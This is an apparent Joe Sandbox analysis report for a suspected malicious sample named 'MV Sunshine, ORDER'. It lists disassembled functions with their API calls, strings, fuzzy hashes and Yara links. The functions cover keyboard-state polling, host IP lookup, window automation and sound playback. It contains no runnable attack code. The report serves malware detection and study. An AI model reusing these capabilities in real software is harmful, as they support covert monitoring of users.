Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 1506413516-4153970271
Opcode ID: faf2d8ab94a2ad3c6055cc9ccae5f7962843baa76c9a8a313ec0e54c5df66f39
Instruction ID: 4534a9dc301eb62bee0d9740d89ec24a9f24151ccd0c52a3f40f1410aaa985ec
Opcode Fuzzy Hash: faf2d8ab94a2ad3c6055cc9ccae5f7962843baa76c9a8a313ec0e54c5df66f39
Instruction Fuzzy Hash: AC215C3294021EBBCF22EFE0CC56FEE777ABF14300F044866F505621A2DA719A58DB50

Function 009E5569 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00987D2C: _memmove.LIBCMT ref: 00987D66

Part of subcall function 00987A84: _memmove.LIBCMT ref: 00987B0D

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 009E55D2
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 009E55E8
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 009E55F9
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 009E560B
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 009E561C

Strings

close PlayMe, xrefs: 009E55E3, 009E5610
alias PlayMe, xrefs: 009E55AB
status PlayMe mode, xrefs: 009E55CD
play PlayMe, xrefs: 009E5617
play PlayMe wait, xrefs: 009E5606
open , xrefs: 009E5581

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: dab7fbee59ee06b876861ffc6e1bcfaaed3d369b83310359f299d63d1646d448
Instruction ID: 47d443f8ba4e058156b308f0681f7afa925970b946d684f5c2254843185beee5
Opcode Fuzzy Hash: dab7fbee59ee06b876861ffc6e1bcfaaed3d369b83310359f299d63d1646d448
Instruction Fuzzy Hash: 6A11C42455016979D720F6A2CC8AEFFBB7CFFE1F04F500829B445E61D1DE605D05CAA1

Function 009E48F3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 009E490E
gethostname.WSOCK32(?,00000100), ref: 009E4928
gethostbyname.WSOCK32(?), ref: 009E4935
_wcscpy.LIBCMT ref: 009E495D
_memmove.LIBCMT ref: 009E4970
inet_ntoa.WSOCK32(?), ref: 009E497B
_strcat.LIBCMT ref: 009E4989
_wcscpy.LIBCMT ref: 009E49A0
WSACleanup.WSOCK32 ref: 009E49AE
_wcscpy.LIBCMT ref: 009E49BC

Strings

0.0.0.0, xrefs: 009E4957

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: 2ae3eb78d8b8121864fcc20747b7d6330aa8f4ff23b1e1b8582ead3ab645b260
Instruction ID: b6cb279f5e7cb8aeeaf68950df0c59fa2e70fab56adbd0e012b1402a15a495a3
Opcode Fuzzy Hash: 2ae3eb78d8b8121864fcc20747b7d6330aa8f4ff23b1e1b8582ead3ab645b260
Instruction Fuzzy Hash: 8411D531904118AFCB21EB659C46FDB77ACAB81B10F0441B6F444B6092EF759E8286A1

Function 009E5217 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 009E521C

Part of subcall function 009A0719: timeGetTime.WINMM(?,75C0B400,00990FF9), ref: 009A071D

Sleep.KERNEL32(0000000A), ref: 009E5248
EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 009E526C
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 009E528E
SetActiveWindow.USER32 ref: 009E52AD
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 009E52BB
SendMessageW.USER32(00000010,00000000,00000000), ref: 009E52DA
Sleep.KERNEL32(000000FA), ref: 009E52E5
IsWindow.USER32 ref: 009E52F1
EndDialog.USER32(00000000), ref: 009E5302

Strings

BUTTON, xrefs: 009E5280

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: c11c068193404be25415dc709b0c69aecdb4b792cba381fe0d3bfd2156dfa685
Instruction ID: 23be084bec5f7d89be1fa2f53247942018575a42a854cc8fd08ec182c35ef64c
Opcode Fuzzy Hash: c11c068193404be25415dc709b0c69aecdb4b792cba381fe0d3bfd2156dfa685
Instruction Fuzzy Hash: 8B21A778504788EFE712DFE1EC89B2D3B6DE79634AF011424F102965B1DBA29C438763

Function 009ED7F8 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 00989997: __itow.LIBCMT ref: 009899C2
Part of subcall function 00989997: __swprintf.LIBCMT ref: 00989A0C

CoInitialize.OLE32(00000000), ref: 009ED855
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 009ED8E8
SHGetDesktopFolder.SHELL32(?), ref: 009ED8FC
CoCreateInstance.OLE32(00A12D7C,00000000,00000001,00A3A89C,?), ref: 009ED948
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 009ED9B7
CoTaskMemFree.OLE32(?,?), ref: 009EDA0F
_memset.LIBCMT ref: 009EDA4C
SHBrowseForFolderW.SHELL32(?), ref: 009EDA88
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 009EDAAB
CoTaskMemFree.OLE32(00000000), ref: 009EDAB2
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 009EDAE9
CoUninitialize.OLE32(00000001,00000000), ref: 009EDAEB

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: a503416b099c02b3084c159db38010470b17465f634616d8a7bcaea08d5a387c
Instruction ID: 6befbfedac557a35580ee7c07614a84297edaa65b431978c30451e345fe1ed8b
Opcode Fuzzy Hash: a503416b099c02b3084c159db38010470b17465f634616d8a7bcaea08d5a387c
Instruction Fuzzy Hash: 72B10E75A00109AFDB14DFA5C884EAEBBB9FF89304B148469F909EB251DB31EE45CB50

Function 009E052C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 009E05A7
SetKeyboardState.USER32(?), ref: 009E0612
GetAsyncKeyState.USER32(000000A0), ref: 009E0632
GetKeyState.USER32(000000A0), ref: 009E0649
GetAsyncKeyState.USER32(000000A1), ref: 009E0678
GetKeyState.USER32(000000A1), ref: 009E0689
GetAsyncKeyState.USER32(00000011), ref: 009E06B5
GetKeyState.USER32(00000011), ref: 009E06C3
GetAsyncKeyState.USER32(00000012), ref: 009E06EC
GetKeyState.USER32(00000012), ref: 009E06FA
GetAsyncKeyState.USER32(0000005B), ref: 009E0723
GetKeyState.USER32(0000005B), ref: 009E0731

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: ceacbb8289f58cfadfd066a85e085d5afe63e6b157dae7bfa92bbb54b6e63df4
Instruction ID: a05fe81c2eeb7e3bc4c3fc293bf6c5a270a26be92bdf142787a20a7a137bb5b4
Opcode Fuzzy Hash: ceacbb8289f58cfadfd066a85e085d5afe63e6b157dae7bfa92bbb54b6e63df4
Instruction Fuzzy Hash: 8851CD70A047C829FB36DBA248557EABFB89F81340F084599D5C6561C2DAE4DFCCCB61

Function 009DC72A Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 009DC746
GetWindowRect.USER32(00000000,?), ref: 009DC758
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 009DC7B6
GetDlgItem.USER32(?,00000002), ref: 009DC7C1
GetWindowRect.USER32(00000000,?), ref: 009DC7D3
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 009DC827
GetDlgItem.USER32(?,000003E9), ref: 009DC835
GetWindowRect.USER32(00000000,?), ref: 009DC846
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 009DC889
GetDlgItem.USER32(?,000003EA), ref: 009DC897
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 009DC8B4
InvalidateRect.USER32(?,00000000,00000001), ref: 009DC8C1

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: db2f90f1b5677c4d26a442d292671b0708f4a061d8e65b4bc9e4664016273f98
Instruction ID: a2a7090d0e52f474b222815a5d8b8688c2da8aa40894570c5c7a899b976ef196
Opcode Fuzzy Hash: db2f90f1b5677c4d26a442d292671b0708f4a061d8e65b4bc9e4664016273f98
Instruction Fuzzy Hash: B85121B1B40209AFDF18CFA9DD85AAEBBBAEB88311F14812DF515E7290D7709D01CB50

Function 0098201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00981B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00982036,?,00000000,?,?,?,?,009816CB,00000000,?), ref: 00981B9A

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 009820D3
KillTimer.USER32(-00000001,?,?,?,?,009816CB,00000000,?,?,00981AE2,?,?), ref: 0098216E
DestroyAcceleratorTable.USER32(00000000), ref: 009BBEF6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,009816CB,00000000,?,?,00981AE2,?,?), ref: 009BBF27
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,009816CB,00000000,?,?,00981AE2,?,?), ref: 009BBF3E
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,009816CB,00000000,?,?,00981AE2,?,?), ref: 009BBF5A
DeleteObject.GDI32(00000000), ref: 009BBF6C

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 92bee375fe0348a2e337a8697e532915a53796278c754028e8abae086f380f53
Instruction ID: 7235903207908c7279d9363552ecc629f4aaac0e5e61a50a799c4df3cf706d90
Opcode Fuzzy Hash: 92bee375fe0348a2e337a8697e532915a53796278c754028e8abae086f380f53
Instruction Fuzzy Hash: 3261AD39104710DFDB35EF54DE48B79B7F5FB82316F108828E44296AA0C776A882DF92

Function 009821A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 009825DB: GetWindowLongW.USER32(?,000000EB), ref: 009825EC

GetSysColor.USER32(0000000F), ref: 009821D3

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 2c68e4304da3b2d5f60ab6cded54823d8499c1b1a6fc33469e406cbc4d28be4d
Instruction ID: f9958a147278af925e821f5c51352d674c841157f20cf5dd98106490346f4cf0
Opcode Fuzzy Hash: 2c68e4304da3b2d5f60ab6cded54823d8499c1b1a6fc33469e406cbc4d28be4d
Instruction Fuzzy Hash: 1F416F31104144AEDB29AF68DC88BB93B69EB46331F144365FE759B2E6C7318C43DB61

Function 009EAB12 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00A0F910), ref: 009EAB76
GetDriveTypeW.KERNEL32(00000061,00A3A620,00000061), ref: 009EAC40
_wcscpy.LIBCMT ref: 009EAC6A

Strings

all, xrefs: 009EAB7C
ramdisk, xrefs: 009EABEA
removable, xrefs: 009EABA8
unknown, xrefs: 009EAC01
network, xrefs: 009EABD4
cdrom, xrefs: 009EAB92
fixed, xrefs: 009EABBE

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: b04dfbdaa8ec5a0ee9a1e1f9f996bed5dda0b317eadaf7d54e50cf216029b1a0
Instruction ID: d312ca66e37612acb6e23eb62d52248880486fdf415971e50e9d44d90490995c
Opcode Fuzzy Hash: b04dfbdaa8ec5a0ee9a1e1f9f996bed5dda0b317eadaf7d54e50cf216029b1a0
Instruction Fuzzy Hash: C05179311083419BC715EF15C882BAAB7A9FFD5704F184829F496972A2DB31ED4ACB93

Function 00989997 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 009899C2
__swprintf.LIBCMT ref: 00989A0C
__i64tow.LIBCMT ref: 009BFA0F

Strings

%.15g, xrefs: 00989A06
True, xrefs: 009BF9D0
0x%p, xrefs: 009BF9F1
False, xrefs: 009BF9D7

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: 7523e83d0e78816f07208de6a7ec52a4f8710171eccf48467e56886571c0ce77
Instruction ID: 1c9a80398e77fab4957ae508ecf77ccb4ccb9300fa6fba5def532464d4ec390c
Opcode Fuzzy Hash: 7523e83d0e78816f07208de6a7ec52a4f8710171eccf48467e56886571c0ce77
Instruction Fuzzy Hash: BB411271604205AFDB24EF38DD42FBAB3E8EB85310F24486EF549D7281EA72D941CB51

Function 00A073C1 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A073D9
CreateMenu.USER32 ref: 00A073F4
SetMenu.USER32(?,00000000), ref: 00A07403
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A07490
IsMenu.USER32(?), ref: 00A074A6
CreatePopupMenu.USER32 ref: 00A074B0
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00A074DD
DrawMenuBar.USER32 ref: 00A074E5

Strings

F, xrefs: 00A074D1
0, xrefs: 00A073CF

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: 9f595dde7d1e6e4f874bea6d17b7a458d401a302d4d93378ec6ea4bda1f82b46
Instruction ID: 10c2279c20fac198dad5aaff374a01c865096037f110f72adeabf41cd79c5deb
Opcode Fuzzy Hash: 9f595dde7d1e6e4f874bea6d17b7a458d401a302d4d93378ec6ea4bda1f82b46
Instruction Fuzzy Hash: FE410979A01209EFDB20DFA4E884E9ABBF5FF49310F144029F955A73A0D732A921CF50

Function 00A0772A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00A077CD
CreateCompatibleDC.GDI32(00000000), ref: 00A077D4
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00A077E7
SelectObject.GDI32(00000000,00000000), ref: 00A077EF
GetPixel.GDI32(00000000,00000000,00000000), ref: 00A077FA
DeleteDC.GDI32(00000000), ref: 00A07803
GetWindowLongW.USER32(?,000000EC), ref: 00A0780D
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00A07821
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00A0782D

Strings

static, xrefs: 00A07765

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 7833286d6cc9fc8252b7706fa3a5234a460e9112c0aae61bd9023e9518d4a742
Instruction ID: 4b2679acfa139f05904589c54941e0b551b9fda8634f0a439169e5d8a78d764f
Opcode Fuzzy Hash: 7833286d6cc9fc8252b7706fa3a5234a460e9112c0aae61bd9023e9518d4a742
Instruction Fuzzy Hash: CE317031505119BFDF219FA4EC08FDA3B69FF09761F114224FA15A61E0D731E862DBA4

Function 009A7040 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 009A707B

Part of subcall function 009A8D68: __getptd_noexit.LIBCMT ref: 009A8D68

__gmtime64_s.LIBCMT ref: 009A7114
__gmtime64_s.LIBCMT ref: 009A714A
__gmtime64_s.LIBCMT ref: 009A7167
__allrem.LIBCMT ref: 009A71BD
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009A71D9
__allrem.LIBCMT ref: 009A71F0
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009A720E
__allrem.LIBCMT ref: 009A7225
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009A7243
__invoke_watson.LIBCMT ref: 009A72B4

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
Instruction ID: 874df97b0810270554937eedef87e39e4f602fb50b5224b78aedfdd2d53f839f
Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
Instruction Fuzzy Hash: E671C871A04716ABE7149EB9CD43BAAF3A8EF52324F14823AF914E7681E770D94087D0

Function 009E2A16 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 009E2A31
GetMenuItemInfoW.USER32(00A46890,000000FF,00000000,00000030), ref: 009E2A92
SetMenuItemInfoW.USER32(00A46890,00000004,00000000,00000030), ref: 009E2AC8
Sleep.KERNEL32(000001F4), ref: 009E2ADA
GetMenuItemCount.USER32(?), ref: 009E2B1E
GetMenuItemID.USER32(?,00000000), ref: 009E2B3A
GetMenuItemID.USER32(?,-00000001), ref: 009E2B64
GetMenuItemID.USER32(?,?), ref: 009E2BA9
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 009E2BEF
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009E2C03
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009E2C24

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: c86c3e18cb56c182eadc7bb0539c386bb934e63013842ccc47117b2b7444b37b
